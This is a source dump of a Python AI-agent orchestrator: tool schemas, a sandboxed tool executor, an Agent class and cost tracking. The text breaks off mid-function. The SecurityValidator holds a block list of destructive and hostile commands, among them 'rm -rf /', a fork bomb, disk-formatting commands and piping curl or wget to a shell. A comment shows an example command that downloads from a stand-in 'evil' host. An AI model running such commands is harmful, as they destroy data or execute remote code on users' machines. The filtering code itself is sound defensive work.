                    "type": "string",
                    "description": "File or directory to search in"
                },
                "recursive": {
                    "type": "boolean",
                    "description": "Search recursively in subdirectories"
                }
            },
            "required": ["pattern", "path"]
        }
    },
    
    "http_request": {
        "name": "http_request",
        "description": "Make an HTTP request. Useful for REST APIs.",
        "parameters": {
            "type": "object",
            "properties": {
                "url": {
                    "type": "string",
                    "description": "URL to request"
                },
                "method": {
                    "type": "string",
                    "enum": ["GET", "POST", "PUT", "DELETE", "PATCH"],
                    "description": "HTTP method"
                },
                "headers": {
                    "type": "object",
                    "description": "Request headers"
                },
                "body": {
                    "type": "string",
                    "description": "Request body (for POST, PUT, PATCH)"
                },
                "timeout": {
                    "type": "number",
                    "description": "Request timeout in seconds"
                }
            },
            "required": ["url"]
        }
    },
    
    "ssh": {
        "name": "ssh",
        "description": "Execute a command on a remote server via SSH.",
        "parameters": {
            "type": "object",
            "properties": {
                "host": {
                    "type": "string",
                    "description": "Server host or IP"
                },
                "command": {
                    "type": "string",
                    "description": "Command to execute on the server"
                },
                "user": {
                    "type": "string",
                    "description": "SSH user (default: root)"
                },
                "key_path": {
                    "type": "string",
                    "description": "Path to SSH key"
                },
                "port": {
                    "type": "integer",
                    "description": "SSH port (default: 22)"
                }
            },
            "required": ["host", "command"]
        }
    },
    
    "list_dir": {
        "name": "list_dir",
        "description": "List the contents of a directory.",
        "parameters": {
            "type": "object",
            "properties": {
                "path": {
                    "type": "string",
                    "description": "Path to the directory"
                },
                "recursive": {
                    "type": "boolean",
                    "description": "List recursively"
                },
                "include_hidden": {
                    "type": "boolean",
                    "description": "Include hidden files"
                }
            },
            "required": ["path"]
        }
    },
}


def get_tool_schema(tool_names: List[str], format: str = "openai") -> List[dict]:
    """
    Get tool schemas in the specified format.
    
    Args:
        tool_names: List of tool names
        format: Output format (openai, anthropic, gemini)
        
    Returns:
        List of tool definitions
    """
    tools = []
    
    for name in tool_names:
        if name not in TOOL_DEFINITIONS:
            continue
            
        tool_def = TOOL_DEFINITIONS[name]
        
        if format == "openai":
            tools.append({
                "type": "function",
                "function": {
                    "name": tool_def["name"],
                    "description": tool_def["description"],
                    "parameters": tool_def["parameters"]
                }
            })
        elif format == "anthropic":
            tools.append({
                "name": tool_def["name"],
                "description": tool_def["description"],
                "input_schema": tool_def["parameters"]
            })
        elif format == "gemini":
            tools.append({
                "function_declarations": [{
                    "name": tool_def["name"],
                    "description": tool_def["description"],
                    "parameters": tool_def["parameters"]
                }]
            })
        else:
            tools.append(tool_def)
    
    return tools


def get_tools_prompt(tool_names: List[str]) -> str:
    """
    Generate a prompt describing available tools.
    
    For models that don't support native function calling.
    """
    if not tool_names:
        return ""
    
    prompt = """## Available Tools

You can use the following tools. To use them, respond with a JSON block like this:

```tool
{
    "tool": "tool_name",
    "params": {
        "param1": "value1"
    }
}
```

Tools:

"""
    
    for name in tool_names:
        if name not in TOOL_DEFINITIONS:
            continue
        
        tool = TOOL_DEFINITIONS[name]
        props = tool["parameters"]["properties"]
        required = tool["parameters"].get("required", [])
        
        prompt += f"### {tool['name']}\n"
        prompt += f"{tool['description']}\n"
        prompt += "Parameters:\n"
        
        for prop_name, prop_def in props.items():
            req_marker = "(required)" if prop_name in required else "(optional)"
            prompt += f"  - {prop_name} {req_marker}: {prop_def.get('description', '')}\n"
        
        prompt += "\n"
    
    prompt += """
After using a tool, you'll receive the result and can continue.
You can use multiple tools in sequence for complex tasks.
"""
    
    return prompt
```
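For a quick sense of the envelope shapes `get_tool_schema` produces, here is a toy definition (illustrative only, not one of the entries above) wrapped the way the `openai` and `anthropic` branches do it:

```python
# Toy tool definition in the internal format used by TOOL_DEFINITIONS
tool_def = {
    "name": "read",
    "description": "Read the contents of a file.",
    "parameters": {
        "type": "object",
        "properties": {"path": {"type": "string", "description": "File path"}},
        "required": ["path"],
    },
}

# OpenAI function-calling shape: nested under a "function" key
openai_tool = {
    "type": "function",
    "function": {
        "name": tool_def["name"],
        "description": tool_def["description"],
        "parameters": tool_def["parameters"],
    },
}

# Anthropic shape: flat, with "input_schema" instead of "parameters"
anthropic_tool = {
    "name": tool_def["name"],
    "description": tool_def["description"],
    "input_schema": tool_def["parameters"],
}
```

The JSON-Schema body is identical in both cases; only the envelope differs, which is why the conversion is a simple re-wrapping.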

---

## orchestrator/tools/executor.py

```python
"""
Secure tool executor.

Features:
- Path sandboxing
- Command validation
- Rate limiting
- Retry with backoff
- Security logging
"""

import asyncio
import json
import re
import shlex
import time
import urllib.request
import urllib.error
from pathlib import Path
from dataclasses import dataclass, field
from typing import Optional, Callable, Dict, Any, List
from datetime import datetime

from ..core import RateLimiter, retry_with_backoff, RetryConfig


@dataclass
class ToolResult:
    """Result of tool execution."""
    tool: str
    success: bool
    output: str
    error: Optional[str] = None
    execution_time: float = 0.0
    timestamp: str = field(default_factory=lambda: datetime.now().isoformat())
    retries: int = 0


class SecurityValidator:
    """Security validator for tool operations."""
    
    # Commands that should never be executed
    DANGEROUS_COMMANDS = {
        "rm -rf /", "rm -rf /*", ":(){ :|:& };:",
        "dd if=", "mkfs", "fdisk", "> /dev/sd",
        "chmod -R 777 /", "chown -R", "curl | sh",
        "wget | sh", "curl | bash", "wget | bash",
    }
    
    # Dangerous patterns
    DANGEROUS_PATTERNS = [
        r"rm\s+-rf\s+/(?!\w)",      # rm -rf / (but not /home)
        r">\s*/dev/sd[a-z]",         # Write to devices
        r"mkfs\.",                   # Format disks
        r"dd\s+if=.+of=/dev",        # dd to devices
        r"\|\s*(?:ba)?sh",           # Piping to shell
        r";\s*rm\s+-rf",             # Command injection with rm
    ]
    
    def __init__(
        self,
        working_dir: Path,
        sandbox: bool = True,
        allowed_commands: Optional[List[str]] = None
    ):
        self.working_dir = working_dir.resolve()
        self.sandbox = sandbox
        self.allowed_commands = allowed_commands
    
    def validate_path(self, path: str) -> tuple[bool, str]:
        """
        Validate that a path is within the sandbox.
        
        Returns:
            (is_valid, resolved_path_or_error)
        """
        if not self.sandbox:
            return True, str(Path(path).expanduser())
        
        try:
            resolved = Path(path).expanduser()
            if not resolved.is_absolute():
                resolved = self.working_dir / resolved
            resolved = resolved.resolve()
            
            # Check if within working_dir
            try:
                resolved.relative_to(self.working_dir)
                return True, str(resolved)
            except ValueError:
                return False, f"Path outside sandbox: {path}"
        except Exception as e:
            return False, f"Invalid path: {e}"
    
    def validate_command(self, command: str) -> tuple[bool, str]:
        """
        Validate that a command is safe.
        
        Returns:
            (is_safe, error_if_unsafe)
        """
        # Check exact dangerous commands
        for dangerous in self.DANGEROUS_COMMANDS:
            if dangerous in command:
                return False, f"Dangerous command: {dangerous}"
        
        # Check dangerous patterns
        for pattern in self.DANGEROUS_PATTERNS:
            if re.search(pattern, command, re.IGNORECASE):
                return False, f"Dangerous pattern: {pattern}"
        
        # Check whitelist if provided
        if self.allowed_commands:
            cmd_name = command.split()[0] if command.split() else ""
            if cmd_name not in self.allowed_commands:
                return False, f"Command not allowed: {cmd_name}"
        
        return True, ""
    
    def sanitize_for_shell(self, value: str) -> str:
        """Escape a value for safe shell use."""
        return shlex.quote(value)
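
# Illustration (hypothetical paths, not executed): with working_dir=/srv/app
# and sandbox=True,
#   validate_path("logs/out.txt")   -> (True,  "/srv/app/logs/out.txt")
#   validate_path("../etc/passwd")  -> (False, "Path outside sandbox: ../etc/passwd")
# and validate_command("curl http://evil | sh") is rejected by the
# piping-to-shell pattern r"\|\s*(?:ba)?sh".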


class ToolExecutor:
    """
    Executes tools securely.
    
    Features:
    - Path sandboxing
    - Command validation
    - Rate limiting
    - Automatic retry
    """
    
    def __init__(
        self,
        working_dir: Optional[str] = None,
        timeout: float = 60.0,
        sandbox_paths: bool = True,
        allowed_commands: Optional[List[str]] = None,
        ssh_key_path: str = "~/.ssh/id_rsa",
        ssh_strict_host_checking: bool = True,
        rate_limit_per_minute: int = 60,
        max_retries: int = 3,
        retry_delay: float = 1.0,
    ):
        self.working_dir = Path(working_dir).resolve() if working_dir else Path.cwd()
        self.timeout = timeout
        self.ssh_key_path = Path(ssh_key_path).expanduser()
        self.ssh_strict_host_checking = ssh_strict_host_checking
        self.max_retries = max_retries
        
        # Security
        self.validator = SecurityValidator(
            self.working_dir,
            sandbox=sandbox_paths,
            allowed_commands=allowed_commands,
        )
        
        # Rate limiting
        self.rate_limiter = RateLimiter(rate_limit_per_minute)
        
        # Retry config
        self.retry_config = RetryConfig(
            max_retries=max_retries,
            base_delay=retry_delay,
        )
        
        # Tool registry
        self._tools: Dict[str, Callable] = {
            "bash": self._exec_bash,
            "read": self._exec_read,
            "write": self._exec_write,
            "glob": self._exec_glob,
            "grep": self._exec_grep,
            "http_request": self._exec_http,
            "ssh": self._exec_ssh,
            "list_dir": self._exec_list_dir,
        }
    
    @property
    def available_tools(self) -> List[str]:
        """List of available tool names."""
        return list(self._tools.keys())
    
    async def execute(self, tool: str, params: dict) -> ToolResult:
        """
        Execute a tool with rate limiting and retry.
        """
        start_time = time.time()
        
        if tool not in self._tools:
            return ToolResult(
                tool=tool,
                success=False,
                output="",
                error=f"Unknown tool: {tool}",
            )
        
        # Rate limiting
        await self.rate_limiter.acquire()
        
        # Execute with retry
        async def do_execute():
            return await self._tools[tool](params)
        
        try:
            result, retries = await retry_with_backoff(
                do_execute,
                config=self.retry_config,
            )
            result.retries = retries
            result.execution_time = time.time() - start_time
            return result
        except Exception as e:
            return ToolResult(
                tool=tool,
                success=False,
                output="",
                error=str(e),
                execution_time=time.time() - start_time,
            )
    
    def parse_tool_calls(self, text: str) -> List[dict]:
        """
        Parse tool calls from text.
        
        Supports formats:
        - ```tool { ... } ```
        - ```json { "tool": ... } ```
        """
        calls = []
        
        # Format: ```tool ... ```
        pattern1 = r'```tool\s*\n?(.*?)\n?```'
        for match in re.findall(pattern1, text, re.DOTALL):
            try:
                data = json.loads(match.strip())
                if "tool" in data:
                    calls.append(data)
            except json.JSONDecodeError:
                continue
        
        # Format: ```json ... ``` with tool
        pattern2 = r'```json\s*\n?(.*?)\n?```'
        for match in re.findall(pattern2, text, re.DOTALL):
            try:
                data = json.loads(match.strip())
                if "tool" in data:
                    calls.append(data)
            except json.JSONDecodeError:
                continue
        
        return calls
    
    async def execute_from_text(self, text: str) -> List[ToolResult]:
        """Execute all tools found in text."""
        calls = self.parse_tool_calls(text)
        results = []
        
        for call in calls:
            tool = call.get("tool")
            params = call.get("params", {})
            result = await self.execute(tool, params)
            results.append(result)
        
        return results
    
    # ==================== TOOL IMPLEMENTATIONS ====================
    
    async def _exec_bash(self, params: dict) -> ToolResult:
        """Execute a bash command securely."""
        command = params.get("command", "")
        working_dir = params.get("working_dir")
        
        if not command:
            return ToolResult(tool="bash", success=False, output="", error="Empty command")
        
        # Validate command
        is_safe, error = self.validator.validate_command(command)
        if not is_safe:
            return ToolResult(tool="bash", success=False, output="", error=error)
        
        # Determine working directory
        cwd = self.working_dir
        if working_dir:
            is_valid, result = self.validator.validate_path(working_dir)
            if is_valid:
                cwd = Path(result)
        
        try:
            process = await asyncio.create_subprocess_exec(
                "/bin/bash", "-c", command,
                stdout=asyncio.subprocess.PIPE,
                stderr=asyncio.subprocess.PIPE,
                cwd=str(cwd),
            )
            
            stdout, stderr = await asyncio.wait_for(
                process.communicate(),
                timeout=self.timeout,
            )
            
            return ToolResult(
                tool="bash",
                success=process.returncode == 0,
                output=stdout.decode("utf-8", errors="replace"),
                error=stderr.decode("utf-8", errors="replace") if process.returncode != 0 else None,
            )
        except asyncio.TimeoutError:
            process.kill()  # don't leak the child process on timeout
            return ToolResult(
                tool="bash",
                success=False,
                output="",
                error=f"Timeout after {self.timeout}s",
            )
    
    async def _exec_read(self, params: dict) -> ToolResult:
        """Read a file within the sandbox."""
        path = params.get("path", "")
        encoding = params.get("encoding", "utf-8")
        
        if not path:
            return ToolResult(tool="read", success=False, output="", error="Empty path")
        
        is_valid, result = self.validator.validate_path(path)
        if not is_valid:
            return ToolResult(tool="read", success=False, output="", error=result)
        
        try:
            content = Path(result).read_text(encoding=encoding)
            return ToolResult(tool="read", success=True, output=content)
        except FileNotFoundError:
            return ToolResult(tool="read", success=False, output="", error=f"File not found: {path}")
        except Exception as e:
            return ToolResult(tool="read", success=False, output="", error=str(e))
    
    async def _exec_write(self, params: dict) -> ToolResult:
        """Write a file within the sandbox."""
        path = params.get("path", "")
        content = params.get("content", "")
        append = params.get("append", False)
        
        if not path:
            return ToolResult(tool="write", success=False, output="", error="Empty path")
        
        is_valid, result = self.validator.validate_path(path)
        if not is_valid:
            return ToolResult(tool="write", success=False, output="", error=result)
        
        try:
            file_path = Path(result)
            file_path.parent.mkdir(parents=True, exist_ok=True)
            
            mode = "a" if append else "w"
            with open(file_path, mode) as f:
                f.write(content)
            
            return ToolResult(
                tool="write",
                success=True,
                output=f"Wrote {len(content)} bytes to {file_path.name}",
            )
        except Exception as e:
            return ToolResult(tool="write", success=False, output="", error=str(e))
    
    async def _exec_glob(self, params: dict) -> ToolResult:
        """Find files by glob pattern."""
        pattern = params.get("pattern", "")
        base_dir = params.get("base_dir")
        
        if not pattern:
            return ToolResult(tool="glob", success=False, output="", error="Empty pattern")
        
        search_dir = self.working_dir
        if base_dir:
            is_valid, result = self.validator.validate_path(base_dir)
            if is_valid:
                search_dir = Path(result)
        
        try:
            files = list(search_dir.glob(pattern))
            safe_files = []
            
            for f in files[:100]:  # Limit results
                try:
                    f.relative_to(self.working_dir)
                    safe_files.append(str(f.relative_to(self.working_dir)))
                except ValueError:
                    continue
            
            output = "\n".join(sorted(safe_files))
            return ToolResult(
                tool="glob",
                success=True,
                output=f"Found {len(safe_files)} files:\n{output}",
            )
        except Exception as e:
            return ToolResult(tool="glob", success=False, output="", error=str(e))
    
    async def _exec_grep(self, params: dict) -> ToolResult:
        """Search text in files."""
        pattern = params.get("pattern", "")
        path = params.get("path", "")
        recursive = params.get("recursive", False)
        
        if not pattern or not path:
            return ToolResult(tool="grep", success=False, output="", error="Pattern or path empty")
        
        is_valid, validated_path = self.validator.validate_path(path)
        if not is_valid:
            return ToolResult(tool="grep", success=False, output="", error=validated_path)
        
        try:
            cmd = ["grep", "-n", "--color=never"]
            if recursive:
                cmd.append("-r")
            cmd.extend([pattern, validated_path])
            
            process = await asyncio.create_subprocess_exec(
                *cmd,
                stdout=asyncio.subprocess.PIPE,
                stderr=asyncio.subprocess.PIPE,
                cwd=str(self.working_dir),
            )
            
            stdout, stderr = await asyncio.wait_for(
                process.communicate(),
                timeout=self.timeout,
            )
            
            # grep exits 0 on match, 1 on no match, >1 on real errors
            if process.returncode in (0, 1):
                return ToolResult(tool="grep", success=True, output=stdout.decode("utf-8", errors="replace"))
            return ToolResult(
                tool="grep",
                success=False,
                output="",
                error=stderr.decode("utf-8", errors="replace"),
            )
        except Exception as e:
            return ToolResult(tool="grep", success=False, output="", error=str(e))
    
    async def _exec_http(self, params: dict) -> ToolResult:
        """Make an HTTP request."""
        url = params.get("url", "")
        method = params.get("method", "GET").upper()
        headers = params.get("headers", {})
        body = params.get("body", "")
        timeout = params.get("timeout", self.timeout)
        
        if not url:
            return ToolResult(tool="http_request", success=False, output="", error="Empty URL")
        
        try:
            data = body.encode() if body else None
            req = urllib.request.Request(url, data=data, method=method)
            
            for key, value in headers.items():
                req.add_header(key, value)
            
            # urllib is blocking; run the request in a worker thread so the
            # event loop is not stalled while waiting on the network
            def _do_request() -> str:
                with urllib.request.urlopen(req, timeout=timeout) as response:
                    return response.read().decode()
            
            content = await asyncio.to_thread(_do_request)
            return ToolResult(tool="http_request", success=True, output=content)
                
        except urllib.error.HTTPError as e:
            return ToolResult(
                tool="http_request",
                success=False,
                output=e.read().decode() if e.fp else "",
                error=f"HTTP {e.code}: {e.reason}",
            )
        except Exception as e:
            return ToolResult(tool="http_request", success=False, output="", error=str(e))
    
    async def _exec_ssh(self, params: dict) -> ToolResult:
        """Execute command via SSH."""
        host = params.get("host", "")
        command = params.get("command", "")
        user = params.get("user", "root")
        key_path = params.get("key_path", str(self.ssh_key_path))
        port = params.get("port", 22)
        
        if not host or not command:
            return ToolResult(tool="ssh", success=False, output="", error="Host or command empty")
        
        # Validate remote command too
        is_safe, error = self.validator.validate_command(command)
        if not is_safe:
            return ToolResult(tool="ssh", success=False, output="", error=f"Unsafe remote command: {error}")
        
        try:
            ssh_cmd = [
                "ssh",
                "-o", f"StrictHostKeyChecking={'yes' if self.ssh_strict_host_checking else 'no'}",
                "-o", "BatchMode=yes",
                "-o", "ConnectTimeout=10",
                "-i", key_path,
                "-p", str(port),
                f"{user}@{host}",
                command,
            ]
            
            process = await asyncio.create_subprocess_exec(
                *ssh_cmd,
                stdout=asyncio.subprocess.PIPE,
                stderr=asyncio.subprocess.PIPE,
            )
            
            stdout, stderr = await asyncio.wait_for(
                process.communicate(),
                timeout=self.timeout,
            )
            
            return ToolResult(
                tool="ssh",
                success=process.returncode == 0,
                output=stdout.decode(),
                error=stderr.decode() if process.returncode != 0 else None,
            )
        except asyncio.TimeoutError:
            return ToolResult(
                tool="ssh",
                success=False,
                output="",
                error=f"SSH timeout after {self.timeout}s",
            )
        except Exception as e:
            return ToolResult(tool="ssh", success=False, output="", error=str(e))
    
    async def _exec_list_dir(self, params: dict) -> ToolResult:
        """List directory contents."""
        path = params.get("path", ".")
        recursive = params.get("recursive", False)
        include_hidden = params.get("include_hidden", False)
        
        is_valid, validated_path = self.validator.validate_path(path)
        if not is_valid:
            return ToolResult(tool="list_dir", success=False, output="", error=validated_path)
        
        try:
            dir_path = Path(validated_path)
            
            if not dir_path.exists():
                return ToolResult(
                    tool="list_dir",
                    success=False,
                    output="",
                    error=f"Directory not found: {path}",
                )
            
            entries = []
            pattern = "**/*" if recursive else "*"
            
            for entry in dir_path.glob(pattern):
                if not include_hidden and entry.name.startswith("."):
                    continue
                
                try:
                    entry.relative_to(self.working_dir)
                except ValueError:
                    continue
                
                entry_type = "d" if entry.is_dir() else "f"
                rel_path = entry.relative_to(dir_path)
                entries.append(f"[{entry_type}] {rel_path}")
            
            return ToolResult(
                tool="list_dir",
                success=True,
                output="\n".join(sorted(entries)[:200]),  # cap the listing at 200 entries
            )
        except Exception as e:
            return ToolResult(tool="list_dir", success=False, output="", error=str(e))
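
The `relative_to` guard used in `_exec_list_dir` can be illustrated standalone. A minimal sketch (the `is_inside` helper name is hypothetical, and it adds a `.resolve()` so symlinked entries cannot escape the sandbox):

```python
# Standalone sketch of the sandbox filter in _exec_list_dir: keep an entry
# only if it resolves inside the working directory; Path.relative_to raises
# ValueError for anything outside it.
from pathlib import Path
import tempfile

working_dir = Path(tempfile.mkdtemp())
(working_dir / "inside.txt").write_text("ok")

def is_inside(entry: Path, root: Path) -> bool:
    try:
        entry.resolve().relative_to(root.resolve())
        return True
    except ValueError:
        return False

print(is_inside(working_dir / "inside.txt", working_dir))  # True
print(is_inside(Path("/etc/passwd"), working_dir))         # False
```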

orchestrator/agents/__init__.py

"""
Agent module.
"""

from .base import Agent, AgentResult

__all__ = ["Agent", "AgentResult"]

orchestrator/agents/base.py

"""
Agent implementation.

An Agent combines:
- A provider (Claude, LiteLLM, etc.)
- Tools
- A role/system prompt
- Logging
"""

import asyncio
from datetime import datetime
from pathlib import Path
from typing import Optional, List, Dict, Any
from dataclasses import dataclass, field

from ..config import get_config, AgentConfig
from ..providers import ClaudeProvider, LiteLLMProvider, ProviderResponse
from ..tools import ToolExecutor


@dataclass
class AgentResult:
    """Result of an agent execution."""
    success: bool
    output: str
    agent_name: str
    timestamp: str = field(default_factory=lambda: datetime.now().isoformat())
    error: Optional[str] = None
    tool_results: List[Dict] = field(default_factory=list)
    usage: Optional[Dict] = None
    retries: int = 0


class Agent:
    """
    Configurable AI agent.
    
    Combines a provider, tools, and a role to create
    a specialized AI assistant.
    """
    
    def __init__(
        self,
        name: str = "",
        role: str = "",
        provider: str = "claude",
        model: str = "sonnet",
        tools: Optional[List[str]] = None,
        servers: Optional[List[str]] = None,
        max_turns: int = 10,
        config_obj: Optional[AgentConfig] = None,
    ):
        """
        Initialize agent from parameters or config object.
        """
        if config_obj:
            self.name = config_obj.name
            self.role = config_obj.role
            self.provider_name = config_obj.provider
            self.model = config_obj.model
            self.tools = config_obj.tools or []
            self.servers = config_obj.servers or []
            self.max_turns = config_obj.max_turns
        else:
            self.name = name
            self.role = role
            self.provider_name = provider
            self.model = model
            self.tools = tools or []
            self.servers = servers or []
            self.max_turns = max_turns
        
        self.config = get_config()
        
        # Paths
        self.log_file = self.config.logs_dir / f"{self.name}.md"
        self.output_dir = self.config.outputs_dir / self.name
        
        # Create provider
        self.provider = self._create_provider()
        
        # Create tool executor for non-native tools
        self.tool_executor = self._create_tool_executor()
        
        # Build system prompt
        self.system_prompt = self._build_system_prompt()
        
        # Initialize
        self.output_dir.mkdir(parents=True, exist_ok=True)
        if not self.log_file.exists():
            self._init_log()
    
    def _create_provider(self):
        """Create the appropriate provider."""
        settings = self.config.settings
        
        common_kwargs = {
            "model": self.model,
            "timeout": settings.timeout,
            "max_retries": settings.max_retries,
            "rate_limit_per_minute": settings.rate_limit_per_minute,
            "enable_circuit_breaker": settings.enable_circuit_breaker,
            "circuit_breaker_threshold": settings.circuit_breaker_threshold,
            "circuit_breaker_timeout": settings.circuit_breaker_timeout,
        }
        
        if self.provider_name == "claude":
            return ClaudeProvider(
                max_turns=self.max_turns,
                working_directory=str(self.config.base_dir),
                **common_kwargs,
            )
        else:
            return LiteLLMProvider(
                max_tool_iterations=self.max_turns,
                **common_kwargs,
            )
    
    def _create_tool_executor(self) -> ToolExecutor:
        """Create tool executor for non-native tools."""
        settings = self.config.settings
        
        return ToolExecutor(
            working_dir=str(self.config.base_dir),
            timeout=settings.timeout,
            sandbox_paths=settings.sandbox_paths,
            allowed_commands=settings.allowed_commands or None,
            ssh_strict_host_checking=settings.ssh_strict_host_checking,
            rate_limit_per_minute=settings.rate_limit_per_minute,
            max_retries=settings.max_retries,
        )
    
    def _build_system_prompt(self) -> str:
        """Build the system prompt including role and server info."""
        prompt = f"# {self.name}\n\n{self.role}"
        
        if self.servers:
            prompt += "\n\n## Available Servers\n"
            for server_name in self.servers:
                server = self.config.get_server(server_name)
                if server:
                    prompt += f"- **{server_name}**: {server.user}@{server.host}"
                    if server.description:
                        prompt += f" ({server.description})"
                    prompt += "\n"
        
        return prompt
    
    def _init_log(self):
        """Initialize the log file."""
        header = f"""# {self.name}

- **Created:** {datetime.now().isoformat()}
- **Provider:** {self.provider_name}
- **Model:** {self.model}
- **Tools:** {', '.join(self.tools) if self.tools else 'none'}

---

"""
        self.log_file.write_text(header)
    
    def log(self, entry_type: str, content: str):
        """Add entry to log file."""
        timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        entry = f"\n## {timestamp} | {entry_type}\n\n{content}\n"
        
        with open(self.log_file, "a") as f:
            f.write(entry)
    
    def _get_non_native_tools(self) -> List[str]:
        """Get tools that need manual execution (not native to provider)."""
        if self.provider_name == "claude":
            # Claude CLI handles: bash, read, write, edit, glob, grep, webfetch
            native = {"bash", "read", "write", "edit", "glob", "grep", "webfetch", "web_fetch"}
            return [t for t in self.tools if t.lower() not in native]
        else:
            # LiteLLM doesn't have native tools
            return self.tools
    
    async def run(self, prompt: str, log_action: bool = True) -> AgentResult:
        """
        Execute a prompt through this agent.
        """
        if log_action:
            self.log("PROMPT", (prompt[:500] + "...") if len(prompt) > 500 else prompt)
        
        try:
            # Determine which tools need manual handling
            non_native_tools = self._get_non_native_tools()
            
            # For Claude provider, pass all tools (it handles native ones)
            # For LiteLLM, we need to handle tools ourselves
            if self.provider_name == "claude":
                response = await self.provider.run_with_tools(
                    prompt=prompt,
                    tools=self.tools,
                    system_prompt=self.system_prompt,
                )
            else:
                # LiteLLM with tool execution
                response = await self.provider.run_with_tools(
                    prompt=prompt,
                    tools=self.tools,
                    system_prompt=self.system_prompt,
                    tool_executor=self.tool_executor,
                )
            
            # Build result
            result = AgentResult(
                success=response.success,
                output=response.text,
                agent_name=self.name,
                error=response.error,
                tool_results=[
                    {
                        "tool": tr.tool,
                        "success": tr.success,
                        "output": tr.output[:200] if tr.output else "",
                        "error": tr.error,
                    }
                    for tr in response.tool_results
                ],
                usage=response.usage.to_dict() if response.usage else None,
                retries=response.retries,
            )
            
            if log_action:
                status = "RESULT" if response.success else "ERROR"
                content = response.text[:500] if response.success else (response.error or "Unknown error")
                self.log(status, content)
            
            return result
            
        except Exception as e:
            if log_action:
                self.log("ERROR", str(e))
            
            return AgentResult(
                success=False,
                output="",
                agent_name=self.name,
                error=str(e),
            )
    
    async def run_with_context(
        self,
        prompt: str,
        context: str,
        log_action: bool = True,
    ) -> AgentResult:
        """
        Execute a prompt with additional context.
        """
        full_prompt = f"{context}\n\n---\n\n{prompt}"
        return await self.run(full_prompt, log_action)
    
    def save_output(self, filename: str, content: str) -> Path:
        """Save content to the agent's output directory."""
        filepath = self.output_dir / filename
        filepath.parent.mkdir(parents=True, exist_ok=True)
        filepath.write_text(content)
        self.log("FILE", f"Created: {filepath}")
        return filepath
    
    def read_log(self, last_n: Optional[int] = None) -> str:
        """Read the agent's log file."""
        if not self.log_file.exists():
            return ""
        
        content = self.log_file.read_text()
        
        if last_n:
            entries = content.split("\n## ")
            return "\n## ".join(entries[-last_n:])
        
        return content
    
    async def health_check(self) -> bool:
        """Check if the agent's provider is healthy."""
        return await self.provider.health_check()
    
    def __repr__(self) -> str:
        return f"Agent({self.name}, {self.provider_name}/{self.model})"
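
The `read_log(last_n=...)` slicing above relies on every entry written by `Agent.log()` starting with the `\n## ` delimiter. A self-contained sketch of that trick:

```python
# Log entries written by Agent.log() begin with "\n## <timestamp> | <type>",
# so splitting on that delimiter and rejoining the tail keeps the newest entries.
log = (
    "# agent\n\nheader\n"
    "\n## 2025-01-01 10:00:00 | PROMPT\n\nfirst\n"
    "\n## 2025-01-01 10:00:05 | RESULT\n\nsecond\n"
    "\n## 2025-01-01 10:01:00 | PROMPT\n\nthird\n"
)

entries = log.split("\n## ")
last_two = "\n## ".join(entries[-2:])

print(last_two.splitlines()[0])  # 2025-01-01 10:00:05 | RESULT
```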

orchestrator/tracking/__init__.py

"""
Cost tracking module.

Track token usage and costs across providers.
"""

from dataclasses import dataclass, field
from datetime import datetime
from typing import Dict, List, Optional
import json


# Cost per million tokens (approximate, may vary)
COST_PER_MILLION = {
    # Claude models
    "claude-opus-4-20250514": {"input": 15.0, "output": 75.0},
    "claude-sonnet-4-20250514": {"input": 3.0, "output": 15.0},
    "claude-3-5-haiku-latest": {"input": 0.25, "output": 1.25},
    
    # OpenAI models
    "gpt-4o": {"input": 2.5, "output": 10.0},
    "gpt-4o-mini": {"input": 0.15, "output": 0.6},
    "gpt-4-turbo": {"input": 10.0, "output": 30.0},
    "o1-preview": {"input": 15.0, "output": 60.0},
    "o1-mini": {"input": 3.0, "output": 12.0},
    
    # Google models
    "gemini/gemini-1.5-pro": {"input": 1.25, "output": 5.0},
    "gemini/gemini-1.5-flash": {"input": 0.075, "output": 0.3},
    
    # Default for unknown models
    "default": {"input": 1.0, "output": 3.0},
}


@dataclass
class RequestCost:
    """Cost information for a single request."""
    model: str
    input_tokens: int
    output_tokens: int
    cache_read_tokens: int = 0
    cache_creation_tokens: int = 0
    timestamp: str = field(default_factory=lambda: datetime.now().isoformat())
    
    @property
    def total_tokens(self) -> int:
        return self.input_tokens + self.output_tokens
    
    @property
    def input_cost(self) -> float:
        """Calculate input cost in USD."""
        rates = COST_PER_MILLION.get(self.model, COST_PER_MILLION["default"])
        # Cache reads are typically 90% cheaper
        regular_input = self.input_tokens - self.cache_read_tokens
        cache_cost = (self.cache_read_tokens / 1_000_000) * rates["input"] * 0.1
        regular_cost = (regular_input / 1_000_000) * rates["input"]
        return regular_cost + cache_cost
    
    @property
    def output_cost(self) -> float:
        """Calculate output cost in USD."""
        rates = COST_PER_MILLION.get(self.model, COST_PER_MILLION["default"])
        return (self.output_tokens / 1_000_000) * rates["output"]
    
    @property
    def total_cost(self) -> float:
        """Total cost in USD."""
        return self.input_cost + self.output_cost


@dataclass
class CostSummary:
    """Summary of costs over multiple requests."""
    total_requests: int = 0
    total_input_tokens: int = 0
    total_output_tokens: int = 0
    total_cache_read_tokens: int = 0
    total_cost_usd: float = 0.0
    by_model: Dict[str, Dict] = field(default_factory=dict)
    
    def to_dict(self) -> dict:
        return {
            "total_requests": self.total_requests,
            "total_input_tokens": self.total_input_tokens,
            "total_output_tokens": self.total_output_tokens,
            "total_tokens": self.total_input_tokens + self.total_output_tokens,
            "total_cache_read_tokens": self.total_cache_read_tokens,
            "total_cost_usd": round(self.total_cost_usd, 6),
            "by_model": self.by_model,
        }


class CostTracker:
    """
    Track costs across multiple requests.
    
    Usage:
        tracker = CostTracker(budget_limit=10.0)
        
        # Record usage
        tracker.record(model="claude-sonnet-4-20250514", input_tokens=1000, output_tokens=500)
        
        # Check status
        print(tracker.summary)
        print(tracker.remaining_budget)
    """
    
    def __init__(
        self,
        budget_limit: Optional[float] = None,
        on_budget_warning: Optional[callable] = None,
        warning_threshold: float = 0.8,
    ):
        """
        Args:
            budget_limit: Optional budget limit in USD
            on_budget_warning: Callback when approaching budget
            warning_threshold: Fraction of budget to trigger warning (0.8 = 80%)
        """
        self.budget_limit = budget_limit
        self.on_budget_warning = on_budget_warning
        self.warning_threshold = warning_threshold
        
        self._requests: List[RequestCost] = []
        self._warning_sent = False
    
    def record(
        self,
        model: str,
        input_tokens: int,
        output_tokens: int,
        cache_read_tokens: int = 0,
        cache_creation_tokens: int = 0,
    ) -> RequestCost:
        """Record a request's token usage."""
        cost = RequestCost(
            model=model,
            input_tokens=input_tokens,
            output_tokens=output_tokens,
            cache_read_tokens=cache_read_tokens,
            cache_creation_tokens=cache_creation_tokens,
        )
        
        self._requests.append(cost)
        
        # Check budget
